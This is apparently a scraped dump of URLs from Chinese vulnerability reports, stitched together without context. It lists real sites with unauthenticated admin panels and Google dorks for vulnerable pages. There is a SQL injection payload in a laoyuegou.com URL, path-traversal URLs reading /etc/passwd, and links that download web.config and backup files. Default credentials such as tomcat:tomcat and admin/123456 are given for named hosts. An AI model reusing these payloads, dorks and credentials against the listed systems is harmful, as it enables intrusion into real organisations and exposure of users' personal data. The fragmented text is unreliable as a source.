http://app.finance.china.com.cn/stock/longhu/stock.php?symbol=000611&d=2014-10-24 http://www.yxrsrc.gov.cn http://www.phoenixcne.de/caiji_news_comment.php?news_id=118239 http://www.phoenixcne.de/activity2013/activity_notice_content.php?notice_id=19&game_id=11 http://www.phoenixcne.de/caiji_news_list.php?category=china http://www.phoenixcne.de/guide.php?satellite_id=5 http://www.phoenixcne.de/important_news_content.php?news_id=134525 http://www.phoenixcne.de/recom_content.php?recom_id=219 http://www.dlgaoji.com/web_job.aspx?PosID=20140929112037301 http://www.hongzhoukan.com/getpass_1.php http://www.hongzhoukan.com/getpass_2.php http://www.hongzhoukan.com/getpass_3.php修改密码 http://www.hongzhoukan.com/getpass_3.php,页面没有做任何验证: http://www.hongzhoukan.com/getpass_4.php,并没有返回任何错误,而且发现同时还提交了值为空的“user”项,通过查看页面代码,发现存在一个属性为hidden名为user的字段: https://github.com/outofforce/tianyun/blob/71ced29dd02ac99edbaa48d11d6d607cb9f6a047/src/com/asiainfo/service/frame/common/SendMessage.java https://hq.mail.chinaunicom.cn/owa/ https://github.com/Nagafk/hello/blob/5dcce6df02da210be3cec4bda0a1e8a02c529012/sendmailtest.py https://corp.netease.com/coremail/ http://web.hnust.cn/xg/ http://web.hnust.cn/xg/xght/login.php?gotopage=%2Fxg%2Fxght%2Findex.php http://tv.gcu.edu.cn/upload/day_141028/201410281221219991.html https://github.com/muyuyuan007/check_private_information/blob/64f3054402952030a1d41362aa1d540b318b6616/check_private_info/config.txt https://github.com/jikaihu/work/blob/d29ee2bbb8d700c98df2c2d42a733fc46a1de128/logcollect/logexcel.py https://mail.hisense.com/ https://ssl.hisense.com/+CSCOE+/logon.html http://eps.xcmg.com:90/custom/groupnewslist.aspx?GroupId=155 http://eps.eastcom.com/custom/GroupNewsList.aspx?GroupId=181 http://zh404eps.cn/custom/GroupNewsList.aspx?groupId=114 http://www.ordos.gov.cn/12345/login.aspx http://www.dzmzj.gov.cn/jzxx/rulelist.asp?cid=2 http://bbs.renrendai.com/uc_server/avatar.php?uid=71673&size=middle http://hvsop.youku.com/player.php?id=2 
http://hvsop.youku.com/player.php?id=2 http://www.baidu.com/s?wd=科发网上查询系统&ie=utf-8 http://cn.bing.com/search?q=科发网上查询系统&ie=utf-8 http://cwch.ahu.edu.cn/querynetweb/wjmm.aspx http://61.142.174.200/cwc/KFweb/wjmm.aspx http://gzcx.tynu.edu.cn/kfweb/wjmm.aspx http://221.5.51.228/cjb/wjmm.aspx http://210.45.92.21/wjmm.aspx http://www.shcdkf.com/kfweb/wjmm.aspx http://cwc.sxufe.edu.cn/KfWeb/wjmm.aspx http://cwch.ahu.edu.cn/querynetweb/wjmm.aspx http://cwch.ahu.edu.cn/querynetweb/wjmm.aspx http://www.vooc.com.cn/studyplan/2*/studyplanmembers xinyi.creditease.cn/ajax.do?action=registerMember http://www.yixin.com/company/ site:gov.cn inurl:sys0_inc_voteresult.asp?VoteID= site:gov.cn inurl:sys0_inc_voteresult.asp?VoteID= http://cslt.riit.tsinghua.edu.cn/cgi-bin/cvss/cvss_request.pl?account=wangd&cvssid=1&step=view_request http://www.dlgaoji.com) http://www.dlgaoji.com/filedown.aspx),查询功能存在POST注入。 www.dlgaoji.com http://www.dlgaoji.com http://act.pao.sdo.com/project/140811zhlj/admin/存在未授权访问。 http://act.pao.sdo.com/project/0910jinqiu/admin http://act.pao.sdo.com/project/140707maidong/admin http://act.pao.sdo.com/project/140627zh/admin http://act.pao.sdo.com/project/140516card/admin http://act.pao.sdo.com/project/140318lovenew/admin/ http://act.pao.sdo.com/project/v83/admin/ http://act.pao.sdo.com/project/111014pk/admin/ http://act.pao.sdo.com/project/101229/admin http://act.pao.sdo.com/project/100601tr/admin http://act.pao.sdo.com/project/100510_3year/Admin http://act.pao.sdo.com/project/turntable/admin/ http://act.pao.sdo.com/project/CallFriend/admin http://act.pao.sdo.com/project/090807lm/admin http://218.76.27.30:8080/ www.51charter.com,猜测后台管理地址http://admin.51charter.com/,访问控制薄弱,可暴力猜测用户名和密码(admin和123456),进入后可查询包机单位、用户的姓名、护照等敏感信息 http://m.he-pai.cn/login/logining http://www.he-pai.cn/phone/memberCenter/selphongbinding.do http://www.he-pai.cn/bank/memberCenter/selbank.do http://www.he-pai.cn/lntpayplandetail/memberCenter/selContract.do 
http://www.he-pai.cn/lntpayplandetail/memberCenter/selContract.do?CN_FL_NO=CTxxxxxxxxxxxxxx&CN_STS=0 http://www.he-pai.cn/investmentDetail/investmentDetails/view.do?ln_no=JK14101500897668 http://www.he-pai.cn/lntpayplandetail/memberCenter/selContract.do?CN_FL_NO=CT20141015056994&CN_STS=0 http://www.he-pai.cn/investmentDetail/investmentDetails/view.do?ln_no=JK14092500644774 http://www.he-pai.cn/lntpayplandetail/memberCenter/selContract.do?CN_FL_NO=CT20140925036331&CN_STS=0 http://www.zhuqu.com/tuce/116911.html http://act.avata.sdo.com/project/20140507qb/admin/Unity.ActivitySwitch.asp http://act.avata.sdo.com/project/2014sprite/admin/ http://act.avata.sdo.com/project/Data/admin/ http://act.avata.sdo.com/project/UrlStatic/admin/ http://act.avata.sdo.com/project/2013Avata61/admin/ http://act.fd.sdo.com/sys/admin_app/存在未授权访问。 http://act.fd.sdo.com/Project/GetCode/admin_app/ http://act.fd.sdo.com/Project/Lottery/admin_app/Default.aspx http://act.fd.sdo.com/bbs/web1/admin_app/Default.aspx http://act.fd.sdo.com/lj/admin/Default.aspx http://act.fd.sdo.com/Project/sjbjc/admin_app/Default.aspx http://act.fd.sdo.com/Project/RLR/admin_app/Default.aspx http://60.19.64.162 http://blog.mumayi.com/wp-login.php http://act.ff.sdo.com/project/20140926bhmt/admin/存在未授权访问。 http://act.ff.sdo.com/project/140402sc/admin http://act.ff.sdo.com/project/140610cosplay/admin http://act.ff.sdo.com/project/cbtevent/admin http://act.ff.sdo.com/project/20140904fftime/admin http://180.166.110.78/asms/index.jsp http://act.bao.sdo.com/project/20111227_sns/admin/Account.asp http://act.bao.sdo.com/201107_event/admin/ http://act.bao.sdo.com/project/showgirle/admin/ http://act.bao.sdo.com/201106_xiaoyouxi/admin/ http://act.bao.sdo.com/project/201106_back/admin/ http://act.bao.sdo.com/project/201104_if/admin/ http://act.bao.sdo.com/201103_xunlei/admin/ http://act.bao.sdo.com/201012_qianzhan/admin/ http://act.bao.sdo.com/201012_xinxi/admin/ http://act.bao.sdo.com/201012_card/admin/ 
http://act.bao.sdo.com/project/ChongZhiHuoDong/admin/ http://act.bao.sdo.com/201011_mail/admin/ http://act.bao.sdo.com/project/renren/admin/ http://act.bao.sdo.com/201010_QQ/admin/ http://act.bao.sdo.com/project/duobao/admin/ http://act.bao.sdo.com/201008_newgame/admin/ http://bbs.igeak.com/bbs/develop.php http://218.58.78.204:8080/Web/performance/login.asp http://218.58.78.204:8080/Web/standard/login.asp http://kj.qdf.gov.cn/ http://bb.sdo.com/ http://www.igeak.com/ http://10w.igeak.com/smartmain.php?mod=smp_user&uid=1 http://58.215.55.97/smartmain.php?mod=smp_user&uid=1(应该是盛大的一个测试站) http://www.beike8.com/bbs/develop.php http://wooyun.org/bugs/wooyun-2010-069864 http://www.agrij.com/) https://github.com/Yunfei1982/cg_site/blob/508e05ad3a6a3e26ff0c0dac0e35a0606f6a9ad6/include/sendmail.php http://spaqbz.zjwst.gov.cn/zjfsdata/loginAction!login.action www.yszfcg.gov.cn/Down.aspx?id= http://www.jszj.com.cn/zaojia/Login/printRegisterInfo.aspx?id=hacksb http://www.bysbfa.com/index.asp http://smile.wanda.cn/smile/praise/index http://zone.wooyun.org/ www.jd.com/pinpai/authcode.php?returnUrl=http%3A%2F%2Fwww.jd.com%2Fpinpai%2F672-14523.html http://active.coupon.jd.com/ilink/couponActiveFront/front_index.action?key=a86e346c8fe14e07b75ea3bd2ba97900&roleId=368219&to=sfbest.jd.com http://active.coupon.jd.com/ilink/couponActiveFront/front_index.action?key=a86e346c8fe14e07b75ea3bd2ba97900&roleId=368219&to=www.qq.com http://www.qorosauto.com/post_campaign/admin http://www.qorosauto.com:80/post_campaign/ www.qorosauto.com http://jwc.hqu.edu.cn http://libs.baidu.com/bootstrap/3.0.3/css/bootstrap.min.css http://libs.baidu.com/jquery/2.0.0/jquery.min.js http://libs.baidu.com/bootstrap/3.0.3/js/bootstrap.min.js inurl:/kdgs/ http://**.**.**/kdgs/_ http://**.**.**/kdgs/_ http://**.**.**/kdgs/_ http://**.**.**/kdgs/_ http://**.**.**/kdgs/ http://*******.gov.cn/kdgs/ http://xxxx.xxx//kdgs/biz/portal/login/login.action http://*******.gov.cn/kdgs/core/superuser/superUserList.jsp 
http://metc.cczu.edu.cn/video/open.asp?film1=12321&film2=2514 http://www.jletc.gov.cn/ http://218.6.128.130/web/web/web/wendang.asp?ks=%BD%CC%D1%A7%D1%D0%BE%BF%BF%C6 http://218.6.128.130/web/web/web/chaxed.asp http://218.6.128.130/photo/201304140221.jpg http://df.wyn88.com:8087/ com:8087 http://df.wyn88.com:8087 https://github.com/jackey/yenching/blob/eda3a27d35a769db573a5ea0291903d5aa59e345/application/controllers/IndexController.php http://mail.pku.edu.cn/ https://github.com/beeven/py-proxiedmail/blob/68f7bb7a698b05ab4e5335b17fdca51d320834b2/SMTPviaHTTPProxy.py http://mail.customs.gov.cn/ https://github.com/skdfeitian/DPPS/blob/5c02725c27ef886849aa9a2da1de33dc4808e617/tags/v1.5/client/FY3Client/Projects/CossPreMonCtrlManager/app.config http://rays.cma.gov.cn/ https://117.146.19.3/datagateway/index.action http://xcb.games.sdo.com/edit/index/27503203 http://wow.laoyuegou.com/guild/raidLadder/type/2/worldRealm/1%29%20AND%20EXTRACTVALUE%282855,CONCAT%281,user%28%29,0x7c,version%28%29%29%29%20AND%20%286145=6145/realm/%E9%98%BF%E5%B0%94%E8%90%A8%E6%96%AF.html http://www.xyrlzycs.com http://www.xyrlzycs.com/wyqz_qy_home.jsp?id=21682 http://med.hunnu.edu.cn/photo/admin.asp http://top.chinaz.com/site_www.stockstar.com.html http://www.lhgcdy.gov.cn/public/down.aspx?filename=web.config&filepath=web.config http://etc.hebut.edu.cn/select/xk_login.aspx http://dg.uninx.com/ http://dg.uninx.com/lottery/zhuce.php http://fzghc.hbu.cn/fazhanguihua/admin/Login.asp http://www.qorosauto.com/post_campaign存在SVN http://www.qorosauto.com/post_campaign/.svn/entries http://www.qorosauto.com/post_campaign/index.php http://www.gsa.gov.gh/ http://apps.sicnu.edu.cn/_wx/_wx_home_news.aspx?fid=&kw= http://yzb.cucn.edu.cn|admin|bd91cb7f4580f19ecccc http://hzw.92le.com/reread/wml.do?fn=../../../../../../../../../../etc/passwd%00.jpg&pn=$gopn&ps=15 http://hzw.92le.com/reread/w.do?f=GEHT&fn=../../../../../../../../../../etc/passwd%00.jpg&pt=ct http://202.108.14.240:8080/monitor.tar.gz 
http://124.238.218.82/ http://124.238.218.82/member/forgotpassword.html http://wdcx.yundasys.com:81/jjjk/jjjk.php http://shop.taikang.com/phpinfo.php http://shop.taikang.com/ck1.log http://shop.taikang.com/phpm/index.php http://zt.365jilin.com sql:http://zt.365jilin.com/module/form/content/?id=190 http://add.11185.cn/vir_add_front/toRegister.a www.7958.com http://www.7958.com http://www.xiao5u.com http://www.Xiao5u.com/Demo/Survey www.xiao5u.com http://www.rswjj.gov.cn/newsinfo.asp?id=29 http://124.238.218.152/ http://124.238.218.152/user/forgetpasswd.do http://m.cndns.com/default.aspx http://m.cndns.com/cloud/index.aspx http://114.255.123.104/ https://github.com/u9510606/NBL_sys/blob/9cdfb1fd62873c01227f850785f0b302c4e351d3/config/initializers/setup_mail.rb https://fwebmail.nctu.edu.tw/roundcube/ http://www.sanyuan.com.cn/flash_upload.php?modelid=1 http://kjc.njupt.edu.cn/admin/loginAdminUser.action http://www.hebmm.org.cn/shownews2.asp?news_id=2920 http://www.hebmm.org.cn/admin/ http://www.jwrd.gov.cn/content.asp?id=838&TypeKind=74%E2%80%98 http://qx.xiangtan.gov.cn/Content.asp?id=101373 http://www.lzfda.gov.cn/wjgl1/Admin_List.asp http://61.129.89.230/YuQing/LoginAdmin.aspx http://kls.scs.gov.cn/klspt/downloadfile.jsp?file=/klspt/downloadfile.jsp http://www.hbbfyfy.com/yy/newPages/Query_Res.aspx?hos_id=xw www.wooyun.org/bugs/wooyun-2010-072921 http://xxxx/system/config/deptTreeXml.jsp?type=group&SG04=1 http://**.**.**/hm/Admin/Checkup/ChkUpMemberPrint.aspxCheckRepID=194435&PatientID=87188 http://www.xiao5u.com/Product/Survey.html http://127.0.0.1/asp/Survey/admin/Admin.asp http://tsg.sxtyu.com:9302/showdetail.asp?class=2&id=19 https://113.107.199.107/ http://www.517lppz.com/admin/login.aspx http://wooyun.org/bugs/wooyun-2010-066857 inurl:cpzs.asp?ProClass= http://www.0527369.com//manage/Product/add_news.asp http://sqjrgjg.com//manage/Product/add_news.asp http://www.zsjyl.com//manage/Product/add_news.asp http://www.cpkgj.com//manage/Product/add_news.asp 
http://sqztbg.com/manage/Product/add_news.asp http://www.yxjzsb.com/manage/Product/add_news.asp http://www.sqjxbj.com/manage/Product/add_news.asp http://www.0517hscz.com/manage/Product/add_news.asp http://www.sabulina.com/manage/Product/add_news.asp http://www.yh9867.com/manage/Product/add_news.asp http://www.njxiangyu.com/manage/Product/add_news.asp http://sqhyjx.com//manage/Product/add_news.asp http://www.sabulina.com//manage/Product/add_news.asp http://www.cba.gov.cn/cbastats/elselivedetail.aspx?id=1 http://cs.sina.com.cn/minisite/news/20120412aw006.html http://www.gaosiedu.com/like/login.php http://www.gaosiedu.com/jianli/ajax_user.php?act=do_reg http://www.gaosiedu.com/xuliqizhong/index.php/AjaxGet http://www.gaosiedu.com/like/login.php http://315web.duowan.com/index.jsp http://219.72.225.74/ www.dyk.com.cn http://www.ccedin.net/ccedinweb/indexshow.actionS2-019漏洞 http://61.139.105.130:8080/zzxy/ http://cjwhcbyjzx.suse.edu.cn/ www.wxpangu.com无锡盘古 http://www.wxliuhuan.com/news_s.asp?id=274 http://www.0510df.com/news_s.asp?id=164 http://www.ssyyjx.com/products_s.asp?id=981 http://www.cxfh.net/products_s.asp?id=1049 http://www.0510df.com/news_s.asp?id=164 http://www.wxthcb.com/news_s.asp?id=148 http://www.wxasl.net/about.asp?id=65 http://wooyun.org/bugs/wooyun-2010-068250 http://gbbs.gsta.com inurl:DownloadShow.asp?DownID= http://218.4.48.253/Chinese/Downloadshow.asp?DownID=131 http://www.leige.com.cn/Chinese/DownloadShow.asp?DownID=26 http://www.jllgs.com/chinese/DownloadShow.asp?DownID=36 http://www.99smsoft.com/Chinese/DownloadShow.asp?DownID=16 http://www.wmt.com.cn/chinese/DownloadShow.asp?DownID=55 http://www.sh-q.com.cn/Chinese/DownloadShow.asp?DownID=43 http://www.szxinjiaxin.com/DownloadShow.asp?DownId=4 http://www.hengtongchemical.com/chinese/DownloadShow.asp?DownID=24 http://www.shtatm.com/Chinese/DownloadShow.asp?DownID=1 http://www.shtatm.com/Chinese/DownloadShow.asp?DownID=1 http://www.mhtsoft.com/Chinese/DownloadShow.asp?DownID=95 
http://www.860536.cn/chinese/DownloadShow.asp?DownID=27 http://www.skyartec.com/DownloadShow.asp?ID=1733 http://qywz21.wygk.cn/Chinese/DownloadShow.asp?DownID=31 http://www.baacebattery.com/downloadshow.asp?id=378 http://www.zh-rx.com/zhrx/Chinese/DownloadShow.asp?DownID=26 http://www.zh-rx.com/zhrx/Chinese/DownloadShow.asp?DownID=26 http://www.wuzhouyiyao.com/Chinese/DownloadShow.asp?DownID=58 http://www.bsckpi.com/kpi/DownloadShow.asp?ID=3 http://www.hydraclean.com.cn/Chinese/DownloadShow.asp?DownID=46 http://www.djwxe.com/chinese/DownloadShow.asp?DownID=27 http://www.xiao5u.com/Product/Survey.html http://127.0.0.1/asp/Survey/admin/Admin.asp?wor=del&id=1 http://127.0.0.1/asp/Survey/admin/Admin.asp?wor=del&id=1 http://isdm.nuc.edu.cn/DownFile.aspx?Upload_url=web.config http://jpkc.nuc.edu.cn/jcskjs/DownFile.aspx?Upload_url=web.config http://gfs.nuc.edu.cn/adminis/DownFile.aspx?Upload_url=web.config http://shss.nuc.edu.cn/DownFile.aspx?Upload_url=web.config http://xscj.nuc.edu.cn/DownFile.aspx?Upload_url=web.config http://std.nuc.edu.cn/DownFile.aspx?Upload_url=web.config http://1y.nuc.edu.cn/DownFile.aspx?Upload_url=AdminLogin.aspx.cs http://www1.nuc.edu.cn/kjy/DownFile.aspx?D_Url=\web.config http://ischoolgu.xmu.edu.cn:8002/jyzdzx/admin/login.asp http://count.52pk.com/php.tar.gz http://copyright.baidu.com/caches/configs/database.php.bak http://www.zhuqu.com/activity/airclean/item-desc http://www.samsoncn.com/ http://ygcw.fy.gov.cn/lq/nczy/admin/index.asp www.dlpss.com http://www.dlpss.com http://119.37.194.120/5.jsp http://fex.baidu.com/blog/2014/04/traffic-hijack-2/): http://211.137.243.2:8902/manager/html http://211.137.243.2:8900/manager/html http://211.137.243.2:9300/manager/html http://211.137.243.2:18103/manager/html http://211.137.243.2:18103/probe/ http://211.137.243.2:9999/ http://211.137.243.2:9500/host-manager/html http://211.137.243.2:29798/ http://211.137.243.2:10001/partner/ http://211.137.243.2:8900/weban/login.jsp 
http://211.137.243.2:8902/report/login.jsp http://211.137.243.2:18103/manager存在弱口令tomcat:tomcat http://share.escience.gov.cn/download.action?filename=xxx http://share.escience.gov.cn/download.action?filename=/etc/passwd http://www.mzredcross.com/show.php?id=558 www.strongsoft.net http://210.75.219.20/guiji/login.do http://dota2.sgamer.com/Public/Images/images/top_c.php http://www.cd-suse.cn/memory_album.php?name=%E9%9D%92%E6%98%A5%E7%9A%84%E5%AE%B6 http://www.57pk.cn/game.php?action=server_list&game_id=2 http://www.tiandemuye.com/lookarticle.asp?articleid=183 http://www.yycyj.com/products.asp?bigclassname=%CE%E5%BD%F0%CB%DC%C1%CF%BB%FA%D0%B5%7C%CE%E5%BD%F0%CB%DC%C1%CF%BB%FA%D0%B5 http://www.bdhjdmp.com/about.asp?id=7 http://www.beifangzite.com/about.asp?id=5 http://www.xynsh.cn/xx.asp?id=1 http://www.cdjphx.com/city_index.aspx?city=sichuan http://www.xing7ba.com/shenghuo/show.asp?id=2590 http://www.zzsywlgs.com/city_index.aspx?city=beijing http://www.demeiju.com/theme.asp?classid=14 http://www.zgbqbh.com/News_show.asp?News_Type=1&News_ID=1304 http://www.yamazensh.com/ContactUs.aspx?rid=1 http://www.tagthg.com/cf.asp?xx_chanpin_class_id=21 http://www.jmmaolian.com/newsshow.asp?ac=news&id=405 http://www.deanqz.com/product_fl.php?type_id=8 http://www.szairbetter.com/Product.asp?bclassid=40 http://www.huweipian.net/plus/search.php?q=%E7%A2%A7%E6%A1%82%E5%9B%AD%E5%A4%AA%E9%98%B3%E5%9F%8E http://www.120911.cn/detail.asp?id=629 http://www.jngcsy.com/News_Details.asp?id=127 http://www.jztiejian.com/sortinfo.asp?column_cat_id=99 http://www.zhongyisuji.com/ArticleShow.asp?ArticleID=110 http://www.qiqiangdakuaitie.com/jyton/info_article.asp?id=1057 http://www.wn5.cc/forum.php?mobile=yes http://www.syworld8.com/news.aspx?newsClassName=%E5%85%AC%E5%8F%B8%E6%96%B0%E9%97%BB http://www.dyzhibo.com/type.php?cat=1000 http://www.czminyi.com/product.asp?bigclass=PE+%B7%A2%C5%DD%CE%FC%CB%DC%B0%FC%D7%B0 http://www.xuelinjixie.com/news.asp?nlt=49 
http://www.gz0599.cn/shop/mk2/cpView.asp?id=858&user=licdb http://sxsnmy.com/nshow.asp?thex=183&Cla=45&ncla=0&clink=jpgc.asp http://www.sjpx100.com/NewsShow.asp?news_type=6&NewsId=617 http://www.xypawn.com/news.asp?ID=397 http://www.meiqivehicle.com/city_index.aspx?city=sichuan http://www.ruifeng-tools.com/ProductInfo.asp?id=45 http://51youqu.com/article.php?pid=22 http://www.jiajikuaiyun.com.cn/news.asp?pd=1 http://www.huowatoys.com/plus/search.php?kwtype=1&keyword=%CD%F8%C9%CF%D0%C5%CF%A2%B2%E9%D1%AF&x=22&y=6 http://www.csg.org.cn/About.asp?CID=2 http://www.xztymm.com/about.asp?id=1 http://www.anhuiguangsha.com/Article.asp?id=396 http://www.xhwfg.com/newinfo/BullShow.asp?id=1 http://www.jcxdhy.com/info/class.asp?id=17 http://www.akstuliu.com/newsindex.asp?class1=1 http://www.haoip.com.cn/jianzhan.asp?bigclassid=1 http://www.jzlhsyzc.com/jszn_list.aspx?classid=1 http://www.sgdapengbaowenbei.com/info.asp?id=1 http://www.trhw.org.cn/list.asp?id=1 http://www.gzlyline.com/tourmeeting/showmeeting.asp?Mid=115 http://www.sidite.com.cn/city_index.aspx?city=ningbo http://www.sntg007.com/cpshow.asp?id=50 http://whuma.com/news.asp?classid=8 http://www.sdhfzyg.com/pt_cpzs.asp?id=91 http://www.yydqzx.com/About.asp?ID=26 http://nxgy.lss.gov.cn/web/topic/nljsList.asp?PARENTTYPEID=3&TYPEID=127 http://www.jpsj88.net/chanpin.asp?sid=217 http://www.jnmll.com/about.asp?id=1 http://www.giscontest.com/12gis/page.asp?aid=560 http://www.water0757.com/jianli.asp?id=71 http://www.ytdlqj.com/info.asp?id=1 http://www.ndhjdmp.com/about.asp?id=7 http://www.gzmingwen.com/news_view.asp?id=129 http://www.cofuller.net/info.asp?id=5 http://www.sdefcp.com/about.asp?id=2 http://www.chwanda.com/info.asp?id=1 http://www.jzjxzz.net/city_index.aspx?city=chongqing http://www.ytjinhui.net/about.asp?id=5 http://www.cdyyvip.com/city_index.aspx?city=sichuan http://www.drguolu.com/rss.php?auth=0 http://www.sostarchina.com/NewsList.asp?ID=27 http://www.yniso9001.net/CaseView.aspx?did=137 
http://www.hjskj.com/city_index.aspx?city=luoyang http://www.shenli.com/show_news.aspx?NewsId=594&CateId=13 http://www.zjxscoop.com/zcfg.asp?classId=18 http://www.sztuojing.com/technology.php?cid=36 http://www.lyhxba.com/company.asp?id=1 http://www.cnfda.net/company1.php?userid=34 http://weidft.com/en/into1.asp?id=17 http://www.mbit.cn/Newsshow.asp?id=3 http://www.csagency.com.cn/chn200909301056397/article.jsp?articleId=7480584 http://www.art800.cn/art.asp?sort=1 http://www.climate.sx.cn/listnews.php?id=2 http://www.sem198.com/newsinfo.aspx?id=212 http://www.huzwater.com/inc/voteShow.asp?subjectid=8 http://www.dayline.cn/demo/Product.asp?M_id=17 http://www.plp88.com/forum.php?mod=rss&auth=0 http://www.szasy.com/about.asp?id=1 http://www.gerlet.net/city_index.aspx?city=tianjin http://www.cqyylp.com/plus/search.php?fruits=&jiage=&keyword=%E6%88%B7%E5%A4%96%E7%94%A8%E5%93%81&kwtype=0 http://www.free-webhosts.com/reviews/Community_Architect.php?cohost=00space http://www.mzzhentian.com/product/view.php?id=26 http://www.cnmeiw.com/ArtNews/ArtNews_list.php?Typeid=126 http://www.jlbssw.cn/info_detail.asp?id=33 http://www.brsbearing.com/ProductList.asp?id=29 http://www.petjy.com/AnnounceInfo.aspx?id=42 http://www.tjdhst14.com/producttd.asp?id=102 http://www.028guanggao.com/product_show.asp?id=121 http://www.gufanyoga.com.cn/kechengsort.php?sortid=1 http://www.guoyujc.com/about.asp?id=1 http://gestaorecursos.cpb.org.br/outras_receita.php/?id=2013 http://www.sddlpcb.com/city_index.aspx?city=shenzhen http://www.ytbona.com/club_show.asp?id=56 http://www.zbguolu.com/info.asp?id=1 http://www.hnqtq.com/city_index.aspx?city=jiangsu http://www.hbxycq.com/about.asp?id=1 http://www.seastarqj.com/productclass2.asp?anclassid=21 http://www.seazheng.cn/base_info.asp?id=1 http://www.seguphoto.com/case.php?id=117 http://www.sem186.com/newshow.asp?id=459 http://www.semservice.net/Contact.asp?id=1 http://www.semzu.com/imgnewshow.asp?id=87 http://www.senlia.com/news_show.asp?id=116 
http://www.senmashop.com/forum.php?mod=rss&auth=0 http://www.sensor4you.com/newss_data.php?cid/97.htm http://www.sensorshome.com/exp.asp?uid=203 http://www.sentaidiban.com/about/index.php?news_id=4 http://www.sentronics.cn/en/show_p.asp?id=703 http://www.seo2006.com/asked_questions.asp?id=11 http://www.seo33.com.cn/about.asp?id=352 http://www.seocnw.com/company.asp?id=24 http://www.seo-k.cn/website/help.asp?id=35 http://www.seook.net/rss.php?auth=0 http://www.seowf.cn/newanswer.asp?id=870 http://www.sesutq.com/ses/Product_info.asp?id=788 http://www.sfajx.cn/about.asp?id=25&cna=%E7%BB%84%E7%BB%87%E7%BB%93%E6%9E%84 http://www.sfgyyl.cn/about.asp?id=1 http://www.sfjart.com/rss.php?auth=0 http://www.sfjiancai.com/cpzs.asp?smallclassid=28 http://www.sf-plastic.com.cn/en/news_detail.asp?id=454 http://www.sg-baoan.com/about.php?tid=9 http://www.sgfsj.com/p.aspx?strClass=36 http://www.sgs.co.za/en/~/link.aspx?_id=BF435EF592424CFF870A598F5F2845C7&_z=z http://www.sgsgroup.com.cn/404.aspx?item=web%3a%7b457EA7E5-AF22-4232-9A39-A0AA87384171%7d%40zh-CN http://www.sgsgroup.com.ua/ru-RU/Automotive.aspx?p=1 http://www.sgwenshidapeng.com/ExmapleDetails.aspx?id=8 http://www.lib.lnnu.edu.cn/zhuanlan/reading/list.asp?classid=1 http://yjsy.fzu.edu.cn/dd_list.asp?newid=19580&classid=928 http://www.newguilin.com/photo-tour-view.asp?id=4 http://www.raybosuye.com/city_index.aspx?city=haerbin http://www.hzhm.net/NewsShow.asp?ID=282 http://www.ntjcrg.com/newsdetail.asp?newsid=79 http://www.hyygg.com/gangguganc/shownews.asp?id=1106 http://www.bibiku.net/soft_list.php?catid=1 http://www.huangdenglong.com/about.asp?id=5 http://cxtt.cn/colourweave/product.php?class1=7&class2=16 http://www.lywcwj.com/info.asp?id=2 http://www.hilem.cn/show_gonggao.asp?id=21 http://jpkc.zzti.edu.cn/Announcement/Announcement.asp?AnnounceId=5 http://ywxk.heuet.edu.cn/show.jsp?id=36 http://www.dqjljs.com/projects_view.asp?id=562 http://www.ahssgsl.com/SysFile/list.asp?catID=1&classID=1 
http://www.zhangdudu.cn/weibo/Content.asp?t=47 http://www.xhhbzj.com/Newsshow.asp?id=21 http://www.huiyemoju.com/about.asp?id=1 http://www.wanli808.com/fznews.asp?id=1197 http://www.dgpeixun.cn/info.asp?id=1 http://finance.whu.edu.cn/web3/content.aspx?lb=zc http://www.sxfda.cn/display.asp?id=12614 http://www.kshtwuliu.com/News_detail.asp?id=248 http://www.soocc.com/forum.php?mod=rss&auth=0 http://www.bjhqtc.com/ythcp_display.php?id=103 http://www.nmgjyg.com/shop.aspx?CID=437 http://www.sdcfsm.com/city_index.aspx?city=shandong http://jrxy.zufe.edu.cn/index.jsp?urltype=tree.TreeTempUrl&wbtreeid=1957 http://www.jqzsb.com/case/xx.asp?id=4 http://www.daigou11.com/newsmore.asp?big=1 http://cartoon.twt.edu.cn/sub_fanzu.php?id=308 http://zhongyibags.com/products-cate.asp?cid=4 http://www.hxmbj.com/info.asp?id=1 http://gzlchina.com/about.asp?bid=67 http://bec.jnu.edu.cn/Dynamicindex.aspx?type=4 http://news.sdp.edu.cn/show_news.php?id=4314 http://www.qilupaint.com/about.asp?NID=636 http://www.jcochb.com/readnews.asp?id=36 http://www.cnfcwd.com/cn/newshow.asp?id=469 http://pxjd.ynnu.edu.cn/News/View.asp?action=list&id=123 http://www.fabricschina.com.cn/AdDetail.asp?id=13 http://confucian.ruc.edu.cn/jgsz.php?cid=28 http://zy.imau.edu.cn/xcbm/clgc/gonggao.asp?id=30 http://www.caitubandai.com/city_index.aspx?city=shan http://xcb.huat.edu.cn/NewsList.aspx?Num=5 http://www.cccir.sdu.edu.cn/td.asp?parent=64 http://yl.lhmc.edu.cn/news_more.asp?lm=44 http://www.yyseedling.com/product.asp?typeid_i=153 http://jyxx.pdsu.edu.cn/list.asp?BigClassID=24 http://rsc.buaa.edu.cn/index.jsp?lang=CH_S http://www.econ.sdu.edu.cn/bkjx/list_all.php?sortid=117 http://old.sdjtu.edu.cn/picshow.asp?piccat_id=3 http://www.wql001.com/xianhuoshow.asp?id=63 http://www.htsljx.com/zx/zx/look.asp?id=5068 http://www.szworkshop.com.cn/about.asp?id=5 http://www.zjg.net.cn/Cpsy/CpsyView.asp?id=2228 http://nucic.ruc.edu.cn/more.php?cid=273 http://www.xalhgg.com/about.asp?id=1 
http://fxylib.whu.edu.cn/libresource/giftlang.php?LID=0 http://www.hkuspace.edu.cn/news/news_more.asp?lm=102 http://office.yeu.edu.cn/bigclass.asp?bigclassid=3 http://xyh.cncnc.edu.cn/lxwm.asp?id=2 http://www.lyjymc.com/about.asp?id=4 http://221.192.198.190/portal/xzsp_xianqu/article.aspx?columntitle=%e4%b8%ad%e5%bf%83%e4%bb%8b%e7%bb%8d http://00471.net/news_content.aspx?c_id=411&n_id=1233 http://china-headman.com/news/gb/list.asp?ID=34 http://www.spanimal.cn/date_frame.asp?special_num=B0033 http://www.gangting.cn/cn/job/online.asp?id=27 http://www.jxnskt.com/new_show.asp?showid=646 http://tw.zjiet.edu.cn/gzzd.asp?frame=showGzzd&news_ID=69 http://xssq.ustc.edu.cn/column.php?cid=1 http://xiaoyou.lixin.edu.cn/default.php?mod=article&settype=0&fid=11 http://ssp.lib.sjtu.edu.cn/browse.php?o=l http://hos.nenu.edu.cn/culture.asp?id=4 http://www.dlrj.edu.cn/Details.aspx?infoId=86 http://zlgc.ynnu.edu.cn/news.aspx?id=11 http://www.123go.cn/index.asp?ID=12162&CaiShiID=5283&AreaCode= http://www.123yanjing.cn/frameList.aspx?StyleID=72 http://www.12jin.com/home.php?mod=task http://www.130-188.com/ArticleShow.asp?ID=94 